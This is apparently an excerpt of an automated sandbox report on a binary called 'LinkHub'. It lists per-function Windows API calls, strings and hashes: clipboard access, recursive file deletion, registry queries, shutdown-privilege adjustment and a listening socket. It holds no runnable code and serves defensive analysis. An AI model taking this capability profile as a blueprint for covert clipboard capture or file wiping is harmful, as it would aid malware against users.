Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: f355d0d417a3ccac4d307b969fbbbdc4ff2e8205e8273f35bee954349bae140a
Instruction ID: ba67f5eb9e3d2d978e5178d42171ebb32dbc48c8dfe7e015a8aaef001842f262
Opcode Fuzzy Hash: f355d0d417a3ccac4d307b969fbbbdc4ff2e8205e8273f35bee954349bae140a
Instruction Fuzzy Hash: 25715BB6900209ABDF10DFA5DC44FEEBBB8FF06350F084515FA26A7190D7359A45DBA0

Function 00C2F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00C4DCD0), ref: 00C2F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C2F594
GetClipboardData.USER32(0000000D), ref: 00C2F5A0
CloseClipboard.USER32 ref: 00C2F5AC
GlobalLock.KERNEL32(00000000), ref: 00C2F5E4
CloseClipboard.USER32 ref: 00C2F5EE
GlobalUnlock.KERNEL32(00000000), ref: 00C2F619
IsClipboardFormatAvailable.USER32(00000001), ref: 00C2F626
GetClipboardData.USER32(00000001), ref: 00C2F62E
GlobalLock.KERNEL32(00000000), ref: 00C2F63F
GlobalUnlock.KERNEL32(00000000), ref: 00C2F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00C2F695
GetClipboardData.USER32(0000000F), ref: 00C2F6A1
GlobalLock.KERNEL32(00000000), ref: 00C2F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C2F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C2F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C2F72F
GlobalUnlock.KERNEL32(00000000), ref: 00C2F750
CountClipboardFormats.USER32 ref: 00C2F771
CloseClipboard.USER32 ref: 00C2F7B6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 5f1d44aee97da7077a2412d7a09f4b0a3a1c60eaf6e11fef176b23152b942eec
Instruction ID: 068d776233177398643a5db424d111678278602779f3af19760fdefa8c865d22
Opcode Fuzzy Hash: 5f1d44aee97da7077a2412d7a09f4b0a3a1c60eaf6e11fef176b23152b942eec
Instruction Fuzzy Hash: CC61AC35204205AFD310EF20E885FAABBB4BF85704F14457DF856876A2DB71EE46CB62

Function 00C273D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C27403
FindClose.KERNEL32(00000000), ref: 00C27457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C27493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C274BA

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00C274F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C27524

Strings

%4d, xrefs: 00C275F6
%02d, xrefs: 00C27645, 00C2764F, 00C2769F, 00C276EF, 00C2773F, 00C2778F
%03d, xrefs: 00C277E7
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00C27577
%4d%02d%02d%02d%02d%02d, xrefs: 00C275AF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 74b1f7cad2938b7dc4d929f35070cb786173c638e8173c4b0b22e91bd982fe6a
Instruction ID: b7e2ba55b60b21088ccb2c7be04744e01d3082246841725710ca8a2757e2e0ce
Opcode Fuzzy Hash: 74b1f7cad2938b7dc4d929f35070cb786173c638e8173c4b0b22e91bd982fe6a
Instruction Fuzzy Hash: F0D15072508304AFC310EBA4C891EBFB7ECAF88704F44496DF595D6191EBB4DA44CB62

Function 00C2A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C2A0A8
GetFileAttributesW.KERNEL32(?), ref: 00C2A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00C2A100
FindNextFileW.KERNEL32(00000000,?), ref: 00C2A118
FindClose.KERNEL32(00000000), ref: 00C2A123
FindFirstFileW.KERNEL32(*.*,?), ref: 00C2A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00C2A18F
SetCurrentDirectoryW.KERNEL32(00C77B94), ref: 00C2A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2A1B7
FindClose.KERNEL32(00000000), ref: 00C2A1C4
FindClose.KERNEL32(00000000), ref: 00C2A1D4

Strings

*.*, xrefs: 00C2A13A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 19d5a05e880e1c425285ea141df5ef45e2902b004470bec713c9d19fbc13823f
Instruction ID: 6ccd6ffa8f492270a4900baa971d71230bf1cde03850620a4f339b0bc8a44959
Opcode Fuzzy Hash: 19d5a05e880e1c425285ea141df5ef45e2902b004470bec713c9d19fbc13823f
Instruction Fuzzy Hash: 6C31C83660062DABDB21AFB4EC49BDE77ACAF05330F1041A6E915E2190EB70DE548A55

Function 00C24763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C24785
_wcslen.LIBCMT ref: 00C247B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C247E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C24803
RemoveDirectoryW.KERNEL32(?), ref: 00C24813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C2489A
CloseHandle.KERNEL32(00000000), ref: 00C248A5
CloseHandle.KERNEL32(00000000), ref: 00C248B0

Strings

:, xrefs: 00C247C7
\??\%s, xrefs: 00C247A0
\, xrefs: 00C247BC

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 90c0e236130953968b9e80722eb939ccdc1fd3f9d7477c8dc6205567542522b7
Instruction ID: d48341255d1626750dc1c6a48428b7339756c82449c15b6187773aca8234b1d9
Opcode Fuzzy Hash: 90c0e236130953968b9e80722eb939ccdc1fd3f9d7477c8dc6205567542522b7
Instruction Fuzzy Hash: 8B318D7591025AABDB219FA4EC49FAF37BCEF89710F1041B6F61AD21A0E77096448B24

Function 00C2A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C2A203
FindNextFileW.KERNEL32(00000000,?), ref: 00C2A25E
FindClose.KERNEL32(00000000), ref: 00C2A269
FindFirstFileW.KERNEL32(*.*,?), ref: 00C2A285
SetCurrentDirectoryW.KERNEL32(?), ref: 00C2A2D5
SetCurrentDirectoryW.KERNEL32(00C77B94), ref: 00C2A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2A2FD
FindClose.KERNEL32(00000000), ref: 00C2A30A
FindClose.KERNEL32(00000000), ref: 00C2A31A

Part of subcall function 00C1E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C1E3B4

Strings

*.*, xrefs: 00C2A280

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 7b9061fba4d6bb50a9a57f23255b50d65e2d1e2b52e3117661dba97a7301277c
Instruction ID: 2888ed7e3cf996b4e12635f47f9b9c18d235324f8edde741d85e1d6046163f53
Opcode Fuzzy Hash: 7b9061fba4d6bb50a9a57f23255b50d65e2d1e2b52e3117661dba97a7301277c
Instruction Fuzzy Hash: B831143150062EABCB20EFA5FC49BDE77ACAF45324F1041A6E825E31A0DB71DF858A55

Function 00C3C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3C10E,?,?), ref: 00C3D415
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D451
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D4C8
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00C3CA09
RegCloseKey.ADVAPI32(00000000), ref: 00C3CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C3CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C3CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C3CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C3CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00C3CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C3CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C3CDE2
RegCloseKey.ADVAPI32(00000000), ref: 00C3CDEF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: f9977fa14716485267234f80bd51ca41157667d2e6a795d2e85e716c2791a71e
Instruction ID: e6ac6c2e54ceaafaada1cf2baa104fcc22280577caec8337cac1f7110a8027f9
Opcode Fuzzy Hash: f9977fa14716485267234f80bd51ca41157667d2e6a795d2e85e716c2791a71e
Instruction Fuzzy Hash: 39024E71614200AFC714DF28C8D5E2ABBE5EF89314F18849DF85ADB2A2DB71ED42CB51

Function 00C1D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB55D1,?,?,00BF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BB5871

Part of subcall function 00C1EAB0: GetFileAttributesW.KERNEL32(?,00C1D840), ref: 00C1EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00C1D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C1DA88
MoveFileW.KERNEL32(?,?), ref: 00C1DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C1DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1DAE2

Part of subcall function 00C1DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C1DAC7,?,?), ref: 00C1DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00C1DAFE
FindClose.KERNEL32(00000000), ref: 00C1DB0F

Strings

\*.*, xrefs: 00C1D978, 00C1D981, 00C1D996

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: c1d2d5dbb965ffaca8186449a6abe65c39e50e24f15fd6ec7011cebb957ac4ed
Instruction ID: 4a8c396fd4c22928eb2a98b9e86703c1994eb5f745a38061fec060d28009eb23
Opcode Fuzzy Hash: c1d2d5dbb965ffaca8186449a6abe65c39e50e24f15fd6ec7011cebb957ac4ed
Instruction Fuzzy Hash: 4361693190510DAFCF15EBA0D992EFDB7B4AF16300F2040A9E402B7191EBB56F49EB61

Function 00C2F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C2F7EE
EmptyClipboard.USER32 ref: 00C2F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00C2F809
CloseClipboard.USER32 ref: 00C2F900

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 260bfd3e96e1486169ef04d7e015eecee1da503826401809c2e26bb86129dc00
Instruction ID: 83075fafce290fa1f2f1a315101fd562b821a6a551b74940126a663f18443c36
Opcode Fuzzy Hash: 260bfd3e96e1486169ef04d7e015eecee1da503826401809c2e26bb86129dc00
Instruction Fuzzy Hash: 6A419F34604625AFD310DF15E488B59BBE4FF45318F15C4ADE82A8BAA2CB75ED42CB90

Function 00C1F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C12010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1205A
Part of subcall function 00C12010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C12087
Part of subcall function 00C12010: GetLastError.KERNEL32 ref: 00C12097

ExitWindowsEx.USER32(?,00000000), ref: 00C1F249

Strings

, xrefs: 00C1F273
SeShutdownPrivilege, xrefs: 00C1F219
@, xrefs: 00C1F23C
, xrefs: 00C1F237

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 1391cc60bfbbb449e76592cc0b8cd731e13ca01f7105168b30e9678952131f39
Instruction ID: 3ae6ee776e1eb0f7e209ef7f1c9704464fc886ec1ca7f2092246cec1a5a80ff8
Opcode Fuzzy Hash: 1391cc60bfbbb449e76592cc0b8cd731e13ca01f7105168b30e9678952131f39
Instruction Fuzzy Hash: 7001D67A6102146BEB2466B89C8ABFE72ACAB0B344F154539FD13E21D1D9709D92B1A0

Function 00C31C61 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C31CD3
WSAGetLastError.WSOCK32 ref: 00C31CE0
bind.WSOCK32(00000000,?,00000010), ref: 00C31D17
WSAGetLastError.WSOCK32 ref: 00C31D22
closesocket.WSOCK32(00000000), ref: 00C31D51
listen.WSOCK32(00000000,00000005), ref: 00C31D60
WSAGetLastError.WSOCK32 ref: 00C31D6A
closesocket.WSOCK32(00000000), ref: 00C31D99

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 457b9886f7741231eee84b22c394dc8ea00c4d00661bb3b1271be93d38bacf63
Instruction ID: 429b3cc6dce66e9a48bb484977675bc7ef45c82c404fc2387fb0ad0fd19e4bb9
Opcode Fuzzy Hash: 457b9886f7741231eee84b22c394dc8ea00c4d00661bb3b1271be93d38bacf63
Instruction Fuzzy Hash: 62415D35A001009FD711EF28D494B69BBE5BF46318F188598E8569F2D2C771ED85CBE1

Function 00BEBCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BEBD54
_free.LIBCMT ref: 00BEBD78
_free.LIBCMT ref: 00BEBEFF
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C546D0), ref: 00BEBF11
WideCharToMultiByte.KERNEL32(00000000,00000000,00C8221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BEBF89
WideCharToMultiByte.KERNEL32(00000000,00000000,00C82270,000000FF,?,0000003F,00000000,?), ref: 00BEBFB6
_free.LIBCMT ref: 00BEC0CB

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 16d09dba169311aad3a5596900e1a2a30efbd0589b16ec5372f3791e8af568c6
Instruction ID: 56264de285d143260c8262397a7ea7e327a23f9588daa6c73ba12c84785f6a50
Opcode Fuzzy Hash: 16d09dba169311aad3a5596900e1a2a30efbd0589b16ec5372f3791e8af568c6
Instruction Fuzzy Hash: 8BC12731900285AFDB24AF7ACC45FAFBBF9EF41320F1445EAE5819B251E7308E418B90

Function 00C1DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB55D1,?,?,00BF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BB5871

Part of subcall function 00C1EAB0: GetFileAttributesW.KERNEL32(?,00C1D840), ref: 00C1EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00C1DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C1DD1B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1DD2C
FindClose.KERNEL32(00000000), ref: 00C1DD43
FindClose.KERNEL32(00000000), ref: 00C1DD4C

Strings

\*.*, xrefs: 00C1DC9D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 8b3995800f485a00b0e172f7bf5ccb1762a0b09a7fb4de4bf2bca11c8e653864
Instruction ID: 3dc76300aa84310b62678f2d965bb437fa01bf58d8711734b1a092c5a1eeb690
Opcode Fuzzy Hash: 8b3995800f485a00b0e172f7bf5ccb1762a0b09a7fb4de4bf2bca11c8e653864
Instruction Fuzzy Hash: CE313C310083459BC211FF60D8919FFB7E8BE96300F404D9DF5E692191EBA5DA09DBA3

Function 00C23A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BF56C2,?,?,00000000,00000000), ref: 00C23A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BF56C2,?,?,00000000,00000000), ref: 00C23A35
LoadResource.KERNEL32(?,00000000,?,?,00BF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00BB66CE), ref: 00C23A45
SizeofResource.KERNEL32(?,00000000,?,?,00BF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00BB66CE), ref: 00C23A56
LockResource.KERNEL32(00BF56C2,?,?,00BF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00BB66CE,?), ref: 00C23A65

Strings

SCRIPT, xrefs: 00C23A2B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: dd31e391eb43da3576950aa084791c99c16b51c746fa08619e6e7c0d84143f5a
Instruction ID: 252c02adee09d024b8119583f7399c0577407cc6d77342bcb9248bd64ddb024c
Opcode Fuzzy Hash: dd31e391eb43da3576950aa084791c99c16b51c746fa08619e6e7c0d84143f5a
Instruction Fuzzy Hash: 32117C74200701BFE7259B65EC48F2B7BB9EFC5B50F14426DF81296590DBB1DD019A20

Function 00C120AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C11916
